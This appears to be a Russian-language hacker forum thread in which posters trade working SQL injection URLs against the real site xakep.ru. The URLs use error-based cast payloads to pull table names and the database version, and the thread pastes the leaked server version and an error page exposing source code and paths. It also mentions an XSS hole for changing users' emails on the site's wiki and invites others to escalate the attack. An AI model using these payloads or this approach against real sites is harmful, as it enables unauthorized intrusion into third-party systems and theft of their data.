вот подборка по ресурсу ХАКЕР.ru.. мо что-то интересное получится SQL-injection скуля вполне рабочая вот только с таблици достать не получилось.. так версия, юзер и тд Microsoft SQL Server 2005 - 9. system_user ну вот что-то посерьезнее вытянуть очень тяжело тут еще и второй параметр уязвим)) http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast((SELECT+TOP+1+T ABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)+as+nvarchar))--&site=xakep http://xakep.ru/local/admin/voter.asp?action=add&filedir=38150&site=xakep'%20or%201=@@version -- Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) Server Error PHP: Line 58: if (Request["Cat"] != null ? !Request["Cat"].Equals("-") : false) Line 59: category = Request["Cat"].ToString(); Line 60: DataTable ds = Pages.Instance.DataPages((SessionFacade.Published ? 1 : 0), category); Line 61: AllRows = ds.Rows.Count; Line 62: DataGrid1.DataSource = ds.DefaultView; Source File: d:\morazm\www\wiki\xakep\Pages.aspx.cs Line: 60 з.ы. когда-то мыла можно было изменять через ксс потом прикрили... теперь вот опять можна http://wiki.xakep.ru/Profile.aspx з.з.ы еще где то в теме с пасивками лежит пасивка на хакере /*раньше работало)*/ тут еще с типами боянчег кто сможет раскрутить на что-то нормальное
все что я постил все нашел сам.. идею с cast от тебя.. поиск не юзал.. а надо было бы(( если все написаное уже было на форуме /*хотя я такого не видел, и не только я*/ и все думают что она не нужна, прошу удалить тему!
На сfмом сайте 5-6 скулей. В каждой из них фильтуются "tables","select", information_* Полный бесперспективняк. по крайней мере этих местах
